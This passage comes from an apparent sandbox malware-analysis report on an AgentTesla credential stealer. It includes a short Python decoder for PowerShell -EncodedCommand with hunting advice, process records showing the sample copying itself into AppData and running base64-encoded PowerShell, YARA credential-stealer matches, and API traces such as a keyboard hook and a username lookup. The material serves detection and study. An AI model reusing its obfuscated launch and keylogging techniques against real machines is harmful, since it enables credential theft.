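        # -ex / -ep (ExecutionPolicy) do not match because they are not such a prefix.
        if switch and "encodedcommand".startswith(switch):
            return decode_encoded_command(tokens[i + 1])
    return None


if __name__ == "__main__":
    print(repr(decode_powershell_cmdline(TARGET_1_CMDLINE)))
```

Run against the report's command line this prints 'start-sleep -seconds 20'. In a hunting query the same logic applies to the command line recorded in Sysmon Event ID 1 or Windows Security 4688; decoding before matching is what lets a rule see the sleep (or anything less benign) instead of an opaque Base64 blob.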

                                                                                Target ID:2
                                                                                Start time:18:30:57
                                                                                Start date:20/03/2023
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff745070000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Target ID:12
                                                                                Start time:18:31:25
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Imagebase:0x50000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low

                                                                                Target ID:13
                                                                                Start time:18:31:25
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Imagebase:0xb0000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low

                                                                                Target ID:14
                                                                                Start time:18:31:26
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Imagebase:0x3d0000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low

                                                                                Target ID:15
                                                                                Start time:18:31:26
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Imagebase:0xd60000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Target ID:16
                                                                                Start time:18:31:33
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
                                                                                Imagebase:0xcf0000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 53%, Virustotal, Browse
                                                                                • Detection: 33%, ReversingLabs
                                                                                Reputation:low

                                                                                Target ID:17
                                                                                Start time:18:31:42
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                                                                Imagebase:0x7ff745070000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 33%, ReversingLabs
                                                                                Reputation:low

                                                                                Target ID:18
                                                                                Start time:18:31:53
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
Imagebase: 0xe00000
File size: 1863168 bytes
MD5 hash: AE2A3B41292C66A9DD6F10C874C05293
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Reputation: low

Target ID: 19
Start time: 18:31:55
Start date: 20/03/2023
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Imagebase: 0x1350000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 20
Start time: 18:31:55
Start date: 20/03/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff745070000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

Target ID: 21
Start time: 18:32:02
Start date: 20/03/2023
Path: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
Imagebase: 0x9f0000
File size: 1863168 bytes
MD5 hash: AE2A3B41292C66A9DD6F10C874C05293
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET

Target ID: 24
Start time: 18:32:28
Start date: 20/03/2023
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Imagebase: 0x1350000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET

Target ID: 25
Start time: 18:32:28
Start date: 20/03/2023
Path: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
Imagebase: 0x130000
File size: 1863168 bytes
MD5 hash: AE2A3B41292C66A9DD6F10C874C05293
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language

Target ID: 26
Start time: 18:32:28
Start date: 20/03/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff745070000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language

Target ID: 27
Start time: 18:32:30
Start date: 20/03/2023
Path: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
Imagebase: 0x950000
File size: 1863168 bytes
MD5 hash: AE2A3B41292C66A9DD6F10C874C05293
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.534154582.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Target ID: 28
Start time: 18:32:50
Start date: 20/03/2023
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Imagebase: 0x1350000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET

Target ID: 29
Start time: 18:32:50
Start date: 20/03/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff68f300000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language


Execution Graph

Execution Coverage: 7.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 54
Total number of Limit Nodes: 1

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000000.00000002.336116685.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5430000_izwFjkhFJm.jbxd
Similarity
• API ID:
• String ID: ,$/$2$3
• API String ID: 0-207288900
• Opcode ID: 926d59e7f626398b4ad2b5f89fb683d394cfdc2b564c452a5cf19f734ae036d8
• Instruction ID: 0dd86723c1af5785d16dc581299da41966b7d08ee56941385ddfe59a5e13256a
• Opcode Fuzzy Hash: 926d59e7f626398b4ad2b5f89fb683d394cfdc2b564c452a5cf19f734ae036d8
• Instruction Fuzzy Hash: 61312E70D0520AEBDF24CFA6C9466EEFBB7BB8E300F11912AD41A67265C7345942CF48
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.336116685.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5430000_izwFjkhFJm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 199bd4bdf504fac21d247d800029e6a4e29fe7d0a6496897eb34e563a61dca68
• Instruction ID: b7c4c780f477082de43483dfef50ee1f4f4f29fdfc94dacb3aba2dd661c905e0
• Opcode Fuzzy Hash: 199bd4bdf504fac21d247d800029e6a4e29fe7d0a6496897eb34e563a61dca68
• Instruction Fuzzy Hash: 8531AA71D056288BEB28CF2BC8457D9BAF7AFC9301F14C4FA841DA6264DB740A85CF40
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05433498
Memory Dump Source
• Source File: 00000000.00000002.336116685.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5430000_izwFjkhFJm.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 566d00aa74185366ca0e20aacc9bd0fb12cbdf3e7f86590f4e8c97aa3b145ee7
• Instruction ID: 614f698959a3578b5eed2c742432c01688c4d0a3f8d2d1f6b7a64b36f42373ce
• Opcode Fuzzy Hash: 566d00aa74185366ca0e20aacc9bd0fb12cbdf3e7f86590f4e8c97aa3b145ee7
• Instruction Fuzzy Hash: 67212875D003099FCB10CFAAC8846EEBBF5FF48324F54842AE519A7250C7799945CBA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• RtlEncodePointer.NTDLL(00000000), ref: 0266291D
Memory Dump Source
• Source File: 00000000.00000002.331821978.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2660000_izwFjkhFJm.jbxd
Similarity
• API ID: EncodePointer
• String ID:
• API String ID: 2118026453-0
• Opcode ID: 5a1a62d38103f2b30ee2faf6041177522c98886698dee6218dae16d7ea64d593
• Instruction ID: ce3e85722eaacac0cda9e05ee17be0e390b34f31be57edf86255faf65cdca773
• Opcode Fuzzy Hash: 5a1a62d38103f2b30ee2faf6041177522c98886698dee6218dae16d7ea64d593
• Instruction Fuzzy Hash: 0521ACB1A003458FDB20DFAAD9987EEBFF4EB48314F108469C894A7240C7B99945CFA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• RtlEncodePointer.NTDLL(00000000), ref: 02662672
Memory Dump Source
• Source File: 00000000.00000002.331821978.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2660000_izwFjkhFJm.jbxd
Similarity
• API ID: EncodePointer
• String ID:
• API String ID: 2118026453-0
• Opcode ID: 287a64d2d042092c8add7f630f6e46be812782e51090bca241ba2b07e82478f4
• Instruction ID: 2be65e135856fdf5178fc381eec1503b836d7d1e449e944cea072a898c262775
• Opcode Fuzzy Hash: 287a64d2d042092c8add7f630f6e46be812782e51090bca241ba2b07e82478f4
• Instruction Fuzzy Hash: A221CDB29003458FCB60DF6AD95879EBBF4EB04318F208029D818E3242C7796986CFA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• RtlEncodePointer.NTDLL(00000000), ref: 02662672
Memory Dump Source
• Source File: 00000000.00000002.331821978.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2660000_izwFjkhFJm.jbxd
Similarity
• API ID: EncodePointer
• String ID:
• API String ID: 2118026453-0
• Opcode ID: 39f94376b50ab57cc978196782942911c5824634a552fdb937a1b8f5a5d737ab
• Instruction ID: fcb297c02c10aee529a744560bde9e9928d7fdbbb4fe44474ae3997438161c41
• Opcode Fuzzy Hash: 39f94376b50ab57cc978196782942911c5824634a552fdb937a1b8f5a5d737ab
• Instruction Fuzzy Hash: 51116AB29002098FDB60DF9AD5487AEBBF8FB44314F608429D819A3741C7B969858FA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.331509247.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c5d000_izwFjkhFJm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6fed8a772b774fbce450fd5cb7dac9efd4754d68b4193acc3b74bf089abfd90a
• Instruction ID: c1af3be03c3b554ef89bddf64e5623f9ea009d3e2ee63fb7c8f4c1a02a867cf7
• Opcode Fuzzy Hash: 6fed8a772b774fbce450fd5cb7dac9efd4754d68b4193acc3b74bf089abfd90a
• Instruction Fuzzy Hash: 5E21277A500340DFCF25CF14D9C0B16BF65FB9C315F248669EC0A0A25AC33AD89ACB66
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.331509247.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c5d000_izwFjkhFJm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2227860bbb5a243a06995f739f35036e805f0fdfc7a8dc17ff8a0820892a95d0
• Instruction ID: d8a1c33b3438350820c07769f93d461eb750e2c5817c5aebddf35893d97ecb7f
• Opcode Fuzzy Hash: 2227860bbb5a243a06995f739f35036e805f0fdfc7a8dc17ff8a0820892a95d0
• Instruction Fuzzy Hash: 482138B9500340DFDB25CF18D9C0B16BF65FB94315F648569DC060B216C336D889C7A2
Uniqueness

Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.331509247.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c5d000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 57579a75ee6befb3812fde9df4a5292aa026fa4f580f003769344605979a8ca1
                                                                                  • Instruction ID: 2209d04a8f2cd5dab0d014af1aae8a6999ec193f3e45a732f8292d3832a0ebe2
                                                                                  • Opcode Fuzzy Hash: 57579a75ee6befb3812fde9df4a5292aa026fa4f580f003769344605979a8ca1
                                                                                  • Instruction Fuzzy Hash: 4C21D57A404280DFCF16CF10D9C4B16BF71FB88314F248699DC494B21AC33AD59ACB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.331509247.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c5d000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                  • Instruction ID: 2bbdf4cbe1f27d64f11cbd4a267b923d576f7eef0ef7e06b058245a316ee641b
                                                                                  • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                  • Instruction Fuzzy Hash: 0F11E1B6404380CFCB12CF04D9C0B16BF71FB84324F2886A9DC050B216C33AD99ACBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:14.8%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0.6%
                                                                                  Total number of Nodes:528
                                                                                  Total number of Limit Nodes:62
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,073E9235), ref: 073EC2A7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: e7cb056b3e43ed84066eb77b9bfa026ef847dd42e9920199a8f7db95ef771283
                                                                                  • Instruction ID: e1e0c4414cbd464d3bb703dc95a137f3ed07f480e67c133262eb9581b8e2b93c
                                                                                  • Opcode Fuzzy Hash: e7cb056b3e43ed84066eb77b9bfa026ef847dd42e9920199a8f7db95ef771283
                                                                                  • Instruction Fuzzy Hash: 8463E571D10B5A8ADB11EF68C884A99F7B1FF99300F11D79AE45877221EB70AAC4CF41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(00000000,00000000), ref: 018EF80B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.526443376.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_18e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: 6c8be0a592720f510c7cecd965c9cfe7708c20b506e3cefaed13ea888f7e42e4
                                                                                  • Instruction ID: 3874156f6977cfadb5f49f7ccb0e6d6b57be990aa586ea6949b7cbc8bcb593f9
                                                                                  • Opcode Fuzzy Hash: 6c8be0a592720f510c7cecd965c9cfe7708c20b506e3cefaed13ea888f7e42e4
                                                                                  • Instruction Fuzzy Hash: 06512474D002688FDB14CFA9C888B9DFBF1BF49314F148119E915AB394DB749944CF95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06FC18F0,00000000,00000000), ref: 06FC20C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.581540887.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_6fc0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: HookWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2559412058-0
                                                                                  • Opcode ID: 0fcf0f21db99c894a4a897f585dc083d34abe1494ed672c53363a82ef2883dbe
                                                                                  • Instruction ID: 130847e8c3bbabd9edbb02ca51520820f7107a6eeb953d9ad6f0003b21e72626
                                                                                  • Opcode Fuzzy Hash: 0fcf0f21db99c894a4a897f585dc083d34abe1494ed672c53363a82ef2883dbe
                                                                                  • Instruction Fuzzy Hash: 282118B5D002099FCB54CF9AC944BEEFBF5EF88324F14841AE415A7250CB75A945CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced: function starting at 73e4008, API call GetModuleHandleW in block 73e4388-73e43b3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: d54e0533e7f1026117a5c36a4342309cbad08cf16f21c96015d0f89d4a1bf049
                                                                                  • Instruction ID: 68ef0e2ffb18baed5d4ba47dd617a491c2c8eb49cb31de7360148dfbd5710618
                                                                                  • Opcode Fuzzy Hash: d54e0533e7f1026117a5c36a4342309cbad08cf16f21c96015d0f89d4a1bf049
                                                                                  • Instruction Fuzzy Hash: 2FB18DB4A007598FDB14DFA9C89466EBBF6FF88210B00892ED44AD7791DB34E905CBD1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced: function starting at 73e5310, API call CreateWindowExW in block 73e53f3-73e5492
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 073E5482
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 81f2de4327b2ed47403bf31b4995dd27bf4ac367a5cad7135cc473a1d71d4a0d
                                                                                  • Instruction ID: 92366576a545e1fbb8796740754af82e38ed7fc693d3ddccfe7c9aef95ec6360
                                                                                  • Opcode Fuzzy Hash: 81f2de4327b2ed47403bf31b4995dd27bf4ac367a5cad7135cc473a1d71d4a0d
                                                                                  • Instruction Fuzzy Hash: 6A510FB6C00259EFDF11CF99C980ACDBFB6BF48314F25816AE818AB260D7759855CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced: function starting at 18ef6c4, API call GetUserNameW in block 18ef7e0-18ef81b
                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(00000000,00000000), ref: 018EF80B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.526443376.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_18e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: b9e7a2cbf9f3ef242b3fdcf3fec32a14df4abf70cb00230df615ceb7dbd0665b
                                                                                  • Instruction ID: f0637be2ef0e779c197a942c642ac78b5874e9c1603a37706b8578fd0545e3f6
                                                                                  • Opcode Fuzzy Hash: b9e7a2cbf9f3ef242b3fdcf3fec32a14df4abf70cb00230df615ceb7dbd0665b
                                                                                  • Instruction Fuzzy Hash: 5E5133B4D002288FDB18CFA9C888B9DFBF1BF49314F148029E919AB394D7749944CF95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced: function starting at 73e205c, API call CreateWindowExW in block 73e53f3-73e5492
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 073E5482
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 5801e4695f7f34934a966682a8b71176b5b1791f15f952a7acf492f3fe757329
                                                                                  • Instruction ID: 0196c03963c3193b0d2fefc90d3900f430fb19fdfb5688b8789498dce2ce12fc
                                                                                  • Opcode Fuzzy Hash: 5801e4695f7f34934a966682a8b71176b5b1791f15f952a7acf492f3fe757329
                                                                                  • Instruction Fuzzy Hash: 1D51D0B5D10319AFDB14CF99C884ADEFBB6BF48314F24812AE819AB250D7759885CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced: function starting at 73ecb50, API call OleInitialize in block 73ecbe0-73ecc42
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 789dcee87842d7a9bb272dc1c65f73fa431532304da4dee8082061a2be853be6
                                                                                  • Instruction ID: d7520c4a16b93c21d691e61ebe1a82723df200bb3126ca59e7f95521e5afc35c
                                                                                  • Opcode Fuzzy Hash: 789dcee87842d7a9bb272dc1c65f73fa431532304da4dee8082061a2be853be6
                                                                                  • Instruction Fuzzy Hash: 4C31E5B6A002258FDB10DB9DD4447DEFBF9EB84324F14886AD09CE7640C335E8868BE0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced: function starting at 73e78ac, API call CallWindowProcW in block 73e8f2a-73e8f62
                                                                                  APIs
                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 073E8F51
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallProcWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2714655100-0
                                                                                  • Opcode ID: a1ffa1b854c5fe4a7a47bd4404b6017130769faac1449758b2fc42cc66686275
                                                                                  • Instruction ID: d0d51c437dfe2c7e987d56f068ff649bca765a04abcbec81da7a2d6bce6c65c3
                                                                                  • Opcode Fuzzy Hash: a1ffa1b854c5fe4a7a47bd4404b6017130769faac1449758b2fc42cc66686275
                                                                                  • Instruction Fuzzy Hash: 2A413DB8D10215DFDB10CF99C488A9ABBFAFF88314F24C859E519A7351D774A941CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced: function starting at 18e4954, API call LoadLibraryA in block 18e769b-18e76e7
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 018E76D7
                                                                                  Memory Dump Source
